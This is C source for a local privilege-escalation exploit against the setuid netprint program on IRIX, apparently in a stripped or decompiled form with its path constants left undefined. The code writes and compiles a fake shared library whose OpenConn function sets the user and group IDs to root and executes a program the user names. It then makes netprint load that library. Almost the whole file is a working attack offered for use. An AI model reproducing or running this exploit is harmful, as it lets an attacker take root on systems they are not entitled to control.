
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






struct stat {int st_mode; scalar_t__ st_uid; } ;
typedef int FILE ;


 char* CCPATH ;
 int FAKESOFILE ;
 char* PATH ;
 int R_OK ;
 char* SOFILE ;
 char* SRCFILE ;
 int S_ISUID ;
 int X_OK ;
 scalar_t__ access (char*,int ) ;
 int cleanup (int) ;
 scalar_t__ execl (char*,char*,char*,int ,char*,char*,char*,int ) ;
 int fclose (int *) ;
 int * fopen (char*,char*) ;
 int fprintf (int *,char*,...) ;
 scalar_t__ malloc (scalar_t__) ;
 int printf (char*,...) ;
 int sprintf (char*,char*,char*,char*,char*) ;
 scalar_t__ stat (char*,struct stat*) ;
 scalar_t__ strlen (char*) ;
 int system (char*) ;

int main(int argc,char **argv){
 char *syscmd;
 struct stat mod;
 FILE *symbol;
 printf("[(IRIX)netprint[] local root exploit, by: v9[v9@realhalo.org]. ]\n");
 if(argc<2){
  printf("[!] syntax: %s </path/to/program/to/exec>\n",argv[0]);
  cleanup(1);
 }
 if(stat(PATH,&mod)){
  printf("[!] failed, could not get stats on %s.\n",PATH);
  cleanup(1);
 }
 if(mod.st_uid||!(S_ISUID&mod.st_mode)){
  printf("[!] failed, %s is not setuid root.\n",PATH);
  cleanup(1);
 }
 if(access(argv[1],X_OK)){
  printf("[!] failed, %s doesn't seem to exist or is not executable.\n",
  argv[1]);
  cleanup(1);
 }
 if(access(CCPATH,X_OK)){
  printf("[!] failed, %s compiler doesn't seem to exist or is not executable."
  "\n",CCPATH);
  cleanup(1);
 }
 printf("[*] making symbols source file for netprint to execute.\n");
 cleanup(0);
 if(!(symbol=fopen(SRCFILE,"w"))){
  printf("[!] failed, could not open temporary file to write to.\n");
  cleanup(1);
 }
 fprintf(symbol,"void OpenConn(){\n");
 fprintf(symbol," seteuid(0);\n");
 fprintf(symbol," setuid(0);\n");
 fprintf(symbol," setegid(0);\n");
 fprintf(symbol," setgid(0);\n");
 fprintf(symbol," printf(\"\[*] success, uid: %%u, euid: %%u, gid: %%u, egid: "
 "%%u.\\n\",getuid(),geteuid(),getgid(),getegid());\n");
 fprintf(symbol," execl(\"%s\",\"%s\",0);\n",argv[1],argv[1]);
 fprintf(symbol,"}\n");
 fprintf(symbol,"void CloseConn(){}\n");
 fprintf(symbol,"void ListPrinters(){}\n");
 fprintf(symbol,"void SendJob(){}\n");
 fprintf(symbol,"void CancelJob(){}\n");
 fprintf(symbol,"void WaitForJob(){}\n");
 fprintf(symbol,"void GetQueue(){}\n");
 fprintf(symbol,"void StartTagging(){}\n");
 fprintf(symbol,"void StopTagging(){}\n");
 fprintf(symbol,"void Install(){}\n");
 fprintf(symbol,"void IsDest(){}\n");
 fclose(symbol);
 printf("[*] done, now compiling symbols source file.\n");
 if(!(syscmd=(char *)malloc(strlen(CCPATH)+strlen(SRCFILE)+strlen(SOFILE)+13+1)
 )){
  printf("[!] failed, could not allocate memory.\n");
  cleanup(1);
 }
 sprintf(syscmd,"%s %s -shared -o %s",CCPATH,SRCFILE,SOFILE);
 system(syscmd);
 printf("[*] done, now checking to see if the symbols source compiled.\n");
 if(access(SOFILE,R_OK)){
  printf("[!] failed, symbols source was not compiled properly.\n");
  cleanup(1);
 }
 printf("[*] done, now executing netprint.\n");
 if(execl(PATH,PATH,"-n",FAKESOFILE,"-h0","-p0","0-0",0)){
  printf("[!] failed, %s did not execute properly.\n",PATH);
  cleanup(1);
 }
}
